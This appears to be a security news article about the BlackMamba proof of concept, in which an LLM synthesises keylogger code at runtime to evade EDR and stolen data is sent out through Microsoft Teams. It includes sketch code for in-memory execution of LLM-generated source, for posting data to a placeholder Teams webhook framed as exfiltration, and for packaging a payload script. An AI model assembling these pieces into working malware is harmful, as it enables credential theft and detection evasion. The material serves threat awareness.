
Researchers have published a report about an attack called BlackMamba, which exploits the large language model (LLM) technology underpinning ChatGPT to synthesize polymorphic keylogger functionality on the fly.
The attack is truly polymorphic in that every time BlackMamba executes, it resynthesizes its keylogging capability. It demonstrates how AI lets malware dynamically modify benign code at runtime without any command-and-control (C2) infrastructure, allowing it to slip past automated security systems that are tuned to detect exactly this kind of behavior.
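To make the mechanism concrete, the following is a minimal, benign sketch of the runtime code-synthesis pattern described above. It assumes the current OpenAI Python SDK and an arbitrary model name; the prompt and the harmless string-reversal task are illustrative stand-ins, not BlackMamba's actual prompt or keylogging code.

# Benign illustration: ask an LLM for fresh source code at runtime and run it
# in memory with exec(). Each execution yields different generated bytes, so
# there is no stable on-disk signature for a scanner to match.
from openai import OpenAI

client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment

response = client.chat.completions.create(
    model="gpt-4o-mini",  # arbitrary example model, not what the PoC used
    messages=[{
        "role": "user",
        "content": "Write a Python function named run_task(s) that returns "
                   "the reversed string. Reply with code only, no fences.",
    }],
)
generated_source = response.choices[0].message.content

namespace = {}
exec(generated_source, namespace)       # executed purely in memory
print(namespace["run_task"]("hello"))   # -> "olleh"

Because the generated source never touches disk and changes on every run, file-signature matching and static hashes have nothing stable to key on.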
The attack was tested against an EDR system that was not named but was characterized as an industry-leading solution, and it often resulted in zero alerts or detections.
Uncovering the capabilities
BlackMamba's built-in keylogger can collect sensitive information from a device, including usernames, passwords, and credit card numbers. Once this data is captured, the malware uses Microsoft Teams, a common and trusted collaboration platform, to send it to a malicious Teams channel.
From there, attackers can exploit the data in various nefarious ways, such as selling it on the dark web or using it to stage further attacks.
Why Microsoft Teams?
Microsoft Teams is a legitimate communication and collaboration tool that is widely used by organizations, so malware authors can leverage it to bypass traditional security defenses such as firewalls and intrusion detection systems. Because the data is sent over encrypted channels, it is also difficult to detect that the channel is being used for exfiltration.
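To illustrate why this blends in, the snippet below is a minimal sketch of posting a message to a Teams channel through an incoming webhook, one common programmatic route into a channel; whether BlackMamba uses exactly this mechanism is an assumption here, and the URL is a placeholder. On the wire it is just an HTTPS POST of JSON to Microsoft-operated webhook infrastructure.

import json
import urllib.request

# Placeholder URL; real incoming webhooks live under *.webhook.office.com.
WEBHOOK_URL = "https://example.webhook.office.com/webhookb2/placeholder"

def post_to_teams_channel(message: str) -> int:
    """Send a simple text payload to a Teams channel via an incoming webhook."""
    request = urllib.request.Request(
        WEBHOOK_URL,
        data=json.dumps({"text": message}).encode("utf-8"),
        headers={"Content-Type": "application/json"},
    )
    # A single TLS-encrypted POST: to a firewall or IDS this looks like any
    # other Teams integration posting a status update.
    with urllib.request.urlopen(request) as response:
        return response.status

From a network monitor's perspective, such a call is indistinguishable from a legitimate notification bot reporting to the same channel.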
BlackMamba's delivery system is based on an open-source Python package that allows developers to convert Python scripts into standalone executable files that run on various platforms, including Windows, macOS, and Linux.
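As a rough illustration of that packaging step, the sketch below bundles a script into a single self-contained binary with PyInstaller, one widely used open-source packager of this kind; the report summarized here does not name the exact package BlackMamba's authors used, and the script name is hypothetical.

import subprocess

# "--onefile" bundles the interpreter, dependencies, and the script into one
# standalone executable for whichever platform the build runs on.
subprocess.run(["pyinstaller", "--onefile", "payload_script.py"], check=True)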
AI-powered attacks like this will become more common as threat actors create polymorphic malware that leverages ChatGPT and other sophisticated LLM-based data-intelligence systems. Automated security technology will have to evolve in turn to manage and combat these threats.
By breaking with tradition, using no C2 communication and generating new, unique code at runtime, malware like BlackMamba is virtually undetectable by today's predictive security solutions. Organizations that believe an EDR can thwart unknown attacks should take note: BlackMamba uses AI to demonstrate otherwise.
The security landscape will have to evolve alongside attackers' use of AI to keep up with the more sophisticated attacks on the horizon. Until then, organizations need to remain vigilant, keep their security measures up to date, and adapt to emerging threats by operationalizing the cutting-edge research being conducted in this space.
This research and proof of concept (PoC) were documented and demonstrated by researchers from HYAS Labs.